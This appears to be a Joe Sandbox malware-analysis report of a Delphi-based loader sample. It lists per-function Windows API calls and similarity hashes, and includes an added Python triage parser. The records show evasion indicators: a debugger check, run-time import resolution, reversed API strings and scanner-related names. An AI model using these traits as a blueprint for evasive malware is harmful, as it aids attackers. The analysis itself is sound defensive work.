                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 185507032-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e7a0c7ed252b85f5192d37a9f36373199c8b68299ab80e1f2e936d2612eb0368
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0c94d3c835c86253c0cb50b061377debafa15537aa5b492b8c6a32fbcbb8ad61
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e7a0c7ed252b85f5192d37a9f36373199c8b68299ab80e1f2e936d2612eb0368
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 58115EB2544200BED2C0FBA4CC85F8BB7BDAB44740F500916B754DA1E0EA75E9449B62
APIs
• SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02CFE625
• SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02CFE641
• SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 02CFE67A
• SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02CFE6F7
• SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 02CFE710
• VariantCopy.OLEAUT32(?,00000000), ref: 02CFE745
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: ArraySafe$BoundIndex$CopyCreateVariant
• String ID:
• API String ID: 351091851-0
• Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
• Instruction ID: a26ca870661523740cea53ede5a383b4706f2f284fe88399a2cfd607609bfeaa
• Opcode Fuzzy Hash: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
• Instruction Fuzzy Hash: 8D51FA7590162D9FCBA2DF58CC80BD9B3BEAF49300F0041D5E609E7221DA30AF859FA5
APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02CF35BA
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02CF3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02CF35ED
• RegCloseKey.ADVAPI32(?,02CF3610,00000000,?,00000004,00000000,02CF3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02CF3603
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: CloseOpenQueryValue
• String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
• API String ID: 3677997916-4173385793
• Opcode ID: 8f245627344ac1a6ed6254d9a874b9f051e8698ef8cca41653af31c3cfab9a55
• Instruction ID: b14d9d27039e3b65fdae1f434fe0febdd417514a34f1f22dac20db4bb89cdb1f
• Opcode Fuzzy Hash: 8f245627344ac1a6ed6254d9a874b9f051e8698ef8cca41653af31c3cfab9a55
• Instruction Fuzzy Hash: AA01B575940298BAFB91DBD0CD02BB977FCE708B00F2105A2FF04D7680E6B4AA10DA59
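The records above are the raw form a triager works from: one "APIs" block per function, the calls Joe Sandbox attributes to it (including calls made inside a subcall), and the Similarity identifiers used to match the function against other samples. As an added example, not part of the Joe Sandbox report or its tooling, the Python below parses this record format into per-function call sequences, keeps the Similarity fields, and tags two behaviours visible in these records: the registry probe of HKLM\SOFTWARE\Borland\Delphi\RTL for FPUMaskValue, which is the Delphi runtime's own start-up check and so a fingerprint of Delphi-compiled code (DBatLoader is Delphi-based), and the GetModuleHandleW/GetProcAddress pair that resolves imports at run time. The sample input is an abridged copy of the records on this page; the tag names and helper functions are my own.

```python
"""Parse the per-function "APIs" records of a Joe Sandbox report into call
sequences and flag two behaviours visible in the records above: dynamic import
resolution (GetModuleHandle* then GetProcAddress) and the Delphi RTL registry
probe (HKLM\\SOFTWARE\\Borland\\Delphi\\RTL, value FPUMaskValue)."""
import re
from dataclasses import dataclass, field

# One annotated call: "[Part of subcall function X: ]Api.MODULE(args), ref: ADDR"
CALL_RE = re.compile(
    r"^•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)\((?P<args>.*)\), ref: (?P<ref>[0-9A-Fa-f]+)$"
)
# "• Key: value" lines; only the Similarity fields below are kept.
FIELD_RE = re.compile(r"^•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
KEEP_FIELDS = {"API ID", "String ID", "API String ID", "Instruction Fuzzy Hash"}
LOADERS = {"GetModuleHandleA", "GetModuleHandleW", "LoadLibraryA", "LoadLibraryW"}


@dataclass
class Call:
    api: str
    module: str
    args: list
    ref: int
    subcall_of: str = ""  # caller address when the report lists it as a subcall


@dataclass
class FunctionRecord:
    calls: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)


def parse_records(text):
    """Split report text into FunctionRecords, one per 'APIs' header."""
    records, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":
            cur = FunctionRecord()
            records.append(cur)
            continue
        if cur is None or not line:
            continue
        m = CALL_RE.match(line)
        if m:
            args = [a for a in m["args"].split(",") if a]
            cur.calls.append(Call(m["api"], m["mod"], args, int(m["ref"], 16), m["sub"] or ""))
            continue
        f = FIELD_RE.match(line)
        if f and f["key"] in KEEP_FIELDS:
            cur.meta[f["key"]] = f["val"]
    return records


def call_sequence(rec, include_subcalls=False):
    """API names in listed order, optionally including calls attributed to callees."""
    return [c.api for c in rec.calls if include_subcalls or not c.subcall_of]


def registry_keys(rec):
    """Registry paths passed (directly or via the stack snapshot) to Reg* APIs."""
    return {a for c in rec.calls if c.api.startswith("Reg") for a in c.args if "\\" in a}


def classify(rec):
    """Behaviour tags (my own names) a triager would pull from one function record."""
    tags, apis = set(), {c.api for c in rec.calls if not c.subcall_of}
    if "GetProcAddress" in apis and apis & LOADERS:
        tags.add("dynamic-import-resolution")
    if any(k.lower().endswith("borland\\delphi\\rtl") for k in registry_keys(rec)):
        tags.add("delphi-rtl-fpu-probe")
    return tags


# Constructed input: an abridged copy of three records from the report above.
SAMPLE_REPORT = r"""APIs
• Part of subcall function 02CFAD3C: VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CFAD59
• Part of subcall function 02CFAD3C: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CFAD7D
• Part of subcall function 02CFAD3C: GetModuleFileNameA.KERNEL32(02CF0000,?,00000105), ref: 02CFAD98
• Part of subcall function 02CFAD3C: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02CFAE2E
• CharToOemA.USER32(?,?), ref: 02CFAEFB
• GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 02CFAF18
• WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 02CFAF1E
• LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 02CFAF5B
• MessageBoxA.USER32(00000000,?,?,00002010), ref: 02CFAF71
Similarity
• API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
APIs
• RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02CF35BA
• RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,02CF3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02CF35ED
• RegCloseKey.ADVAPI32(?,02CF3610,00000000,?,00000004,00000000,02CF3609,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 02CF3603
Similarity
• API ID: CloseOpenQueryValue
• String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
APIs
• GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
• GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
• GetProcAddress.KERNEL32(?,?), ref: 02D082D9
"""

if __name__ == "__main__":
    for i, rec in enumerate(parse_records(SAMPLE_REPORT)):
        print(i, rec.meta.get("API ID", "-"), call_sequence(rec), sorted(classify(rec)))
```

Stack-snapshot arguments (the trailing values after the API's real parameters) are kept verbatim, which is why the Delphi key path also shows up in the RegQueryValueExA and RegCloseKey calls; registry_keys() deduplicates them. Subcall entries are excluded from classify() so that a behaviour is attributed to the function that actually performs it.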
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 02D082D9
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: AddressProc$HandleModule
• String ID: Kernel32$sserddAcorPteG
• API String ID: 667068680-1372893251
APIs
• GetThreadLocale.KERNEL32(?,00000000,02CFAAE7,?,?,00000000), ref: 02CFAA68
  • Part of subcall function 02CFA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CFA7E2
• GetThreadLocale.KERNEL32(00000000,00000004,00000000,02CFAAE7,?,?,00000000), ref: 02CFAA98
• EnumCalendarInfoA.KERNEL32(Function_0000A99C,00000000,00000000,00000004), ref: 02CFAAA3
• GetThreadLocale.KERNEL32(00000000,00000003,00000000,02CFAAE7,?,?,00000000), ref: 02CFAAC1
• EnumCalendarInfoA.KERNEL32(Function_0000A9D8,00000000,00000000,00000003), ref: 02CFAACC
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
Similarity
• API ID: Locale$InfoThread$CalendarEnum
• String ID:
• API String ID: 4102113445-0
APIs
• GetThreadLocale.KERNEL32(?,00000000,02CFACD0,?,?,?,?,00000000,00000000,00000000,00000000,00000000), ref: 02CFAB2F
  • Part of subcall function 02CFA7C4: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 02CFA7E2
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
Similarity
• API ID: Locale$InfoThread
• String ID: eeee$ggg$yyyy
• API String ID: 4232894706-1253427255
APIs
• GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02D0823C,?,?,00000000,?,02D07A7E,ntdll,00000000,00000000,02D07AC3,?,?,00000000), ref: 02D0820A
  • Part of subcall function 02D08274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02D082FC,?,?,00000000,00000000,?,02D08215,00000000,KernelBASE,00000000,00000000,02D0823C), ref: 02D082C1
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02D082C7
  • Part of subcall function 02D08274: GetProcAddress.KERNEL32(?,?), ref: 02D082D9
• GetModuleHandleA.KERNELBASE(?), ref: 02D0821E
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
Similarity
• API ID: HandleModule$AddressProc
• String ID: AeldnaHeludoMteG$KernelBASE
• API String ID: 1883125708-1952140341
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: e828f9928802cf491d30d5eeae5100ecaf51f33695833eaf5c877393e400496c
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 0640b9ff4c8fa73f037d7641c643a08497c7c38b982894daa4f9b902de381d2e
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e828f9928802cf491d30d5eeae5100ecaf51f33695833eaf5c877393e400496c
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8AF09670A44704AFF754FFB4EC81A5AB7EEE74E700B518860F910D7760E634AE14AA64
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KernelBase,?,02D0FAEB,UacInitialize,02D77380,02D1B7B8,OpenSession,02D77380,02D1B7B8,ScanBuffer,02D77380,02D1B7B8,ScanString,02D77380,02D1B7B8,Initialize), ref: 02D0F6EE
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 02D0F700
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: IsDebuggerPresent$KernelBase
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1646373207-2367923768
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: d74c6094f8356e214314601eaf1ff6cd70c9a41698f7f19a350fad1f38b5f261
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: a8ec699d20edafa7273116ceed5b23290b7382a99a35203e26f07ebe896169d1
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d74c6094f8356e214314601eaf1ff6cd70c9a41698f7f19a350fad1f38b5f261
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CFD012A13503501DBE5073F82CC4A19038C999452D3300E20B233C76E2E9B6AC19A116
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(kernel32.dll,?,02D1D10B,00000000,02D1D11E), ref: 02CFC47A
                                                                                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetDiskFreeSpaceExA), ref: 02CFC48B
                                                                                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                                                                                                                                                                                                                                      • String ID: GetDiskFreeSpaceExA$kernel32.dll
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 1646373207-3712701948
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: 0867e448f86ec9753e218d42b375bc144663fc286e4df0d64ddaf47578ad08a0
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: aeb014d65e0943bf258f6bf12a996be28fdf19eab3133e0e1912eb2e1e6a8da8
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0867e448f86ec9753e218d42b375bc144663fc286e4df0d64ddaf47578ad08a0
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4AD05EE0B4030A6AE7C4EFF194806313B9C8398310F104826EB0155600E7725A14CF14
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 02CFE297
                                                                                                                                                                                                                                                                                                                                                      • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 02CFE2B3
                                                                                                                                                                                                                                                                                                                                                      • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 02CFE32A
                                                                                                                                                                                                                                                                                                                                                      • VariantClear.OLEAUT32(?), ref: 02CFE353
                                                                                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
                                                                                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                                                                                      • API ID: ArraySafe$Bound$ClearIndexVariant
                                                                                                                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                                                                                                                      • API String ID: 920484758-0
                                                                                                                                                                                                                                                                                                                                                      • Opcode ID: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                                                                                                                                                                                      • Instruction ID: 53c3ef733158b3ec2c291cc4f25d9c405f94c337afcfc554e38b643b0e984283
                                                                                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cd7e56306b14da739c94dd26db2064fb48e8dac8868798fc3541503821c87934
                                                                                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22412975A012299FCBE2DB58CC94BC9B3BEAF48304F0041D5E64DA7221DA30AF849F94
                                                                                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                                                                                      • VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CFAD59
                                                                                                                                                                                                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CFAD7D
• GetModuleFileNameA.KERNEL32(02CF0000,?,00000105), ref: 02CFAD98
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02CFAE2E
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
• Opcode ID: 1ca2de381ab223f366c3363218d6e667702318a6a1161a720136fb3b43c5d309
• Instruction ID: 924ee3da6ad75c639216460b159d36220b57140d37d76bb66001de14a7eb3fbe
• Opcode Fuzzy Hash: 1ca2de381ab223f366c3363218d6e667702318a6a1161a720136fb3b43c5d309
• Instruction Fuzzy Hash: F9413B71A402589BDBE1DB68CC84BDAB7FDAB48340F4441E6A648E7241EB749F84DF90
APIs
• VirtualQuery.KERNEL32(?,?,0000001C), ref: 02CFAD59
• GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 02CFAD7D
• GetModuleFileNameA.KERNEL32(02CF0000,?,00000105), ref: 02CFAD98
• LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 02CFAE2E
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: FileModuleName$LoadQueryStringVirtual
• String ID:
• API String ID: 3990497365-0
• Opcode ID: 376f0348fe90836928dd88bc4cf15aa112c9e6c5aac8e48a22066e17fb41d9be
• Instruction ID: a07394182bb27a42a22cde4b1e50d5c918b45283fdce426f9b09f535dc67d49a
• Opcode Fuzzy Hash: 376f0348fe90836928dd88bc4cf15aa112c9e6c5aac8e48a22066e17fb41d9be
• Instruction Fuzzy Hash: B9414D71A402589BDBE1DB68CC84BDAB7FDAB48340F4441E6A748E7241EB749F84DF90
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 1a3aee59bb339cc15ffd2c0a5611125ad1a0fb4ef99f4675fb7154d342ab1a9b
• Instruction ID: 0603ecc18c82405f2b97e2393ba52d536f166662de716f2b8990c4e30a7e120a
• Opcode Fuzzy Hash: 1a3aee59bb339cc15ffd2c0a5611125ad1a0fb4ef99f4675fb7154d342ab1a9b
• Instruction Fuzzy Hash: 65A1F5777106008BD7D9AA7D9C843ADB3D29BC4225F1D423EE31DCB381EBE98A469650
APIs
• GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000100,00000000,02CF95DA), ref: 02CF9572
• GetDateFormatA.KERNEL32(00000000,00000004,?,00000000,?,00000100,00000000,02CF95DA), ref: 02CF9578
Strings
Memory Dump Source
• Source File: 00000000.00000002.1462328557.0000000002CF1000.00000020.00001000.00020000.00000000.sdmp, Offset: 02CF0000, based on PE: true
• Associated: 00000000.00000002.1462273751.0000000002CF0000.00000002.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1462595036.0000000002D1E000.00000004.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002D77000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000000.00000002.1463242717.0000000002E6E000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2cf0000_C6dAUcOA6M.jbxd
Similarity
• API ID: DateFormatLocaleThread
• String ID: yyyy
• API String ID: 3303714858-3145165042
• Opcode ID: e3f00a4ef3420892305211019b92d1b17fe5d94f37fa02fc1136dbb47882da68
• Instruction ID: 7aeea3749359e840b538659bf435d348fa8ef9d2da19804006db52414b03ebdc
• Opcode Fuzzy Hash: e3f00a4ef3420892305211019b92d1b17fe5d94f37fa02fc1136dbb47882da68
• Instruction Fuzzy Hash: DB216D71A042589FDFE4EFA8C881BAEB3B9EF49700F5101A6EA05E7250D7309F40DB65
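The per-function API listings on this page (one `Name.MODULE(args), ref: ADDR` line per call site, with a `Part of subcall function XXXX:` prefix for calls made one level down) are the part of the report a reviewer actually reads, and the interesting signal is in which APIs co-occur inside one function rather than in any single call. The script below is an added triage example, not part of the Joe Sandbox report or of Joe Sandbox's own tooling: it parses lines in that form and applies a few co-occurrence rules. The sample entries are copied from this page's listings; the entry names, the rule labels and the choice of which API pairs count as suspicious are assumptions for illustration. One caveat the parser has to respect: the argument list Joe Sandbox prints is a window of stack slots at the call site, not the function's declared parameters, so module names such as `KernelBASE` or `ntdll` are harvested from anywhere in that window.

```python
import re

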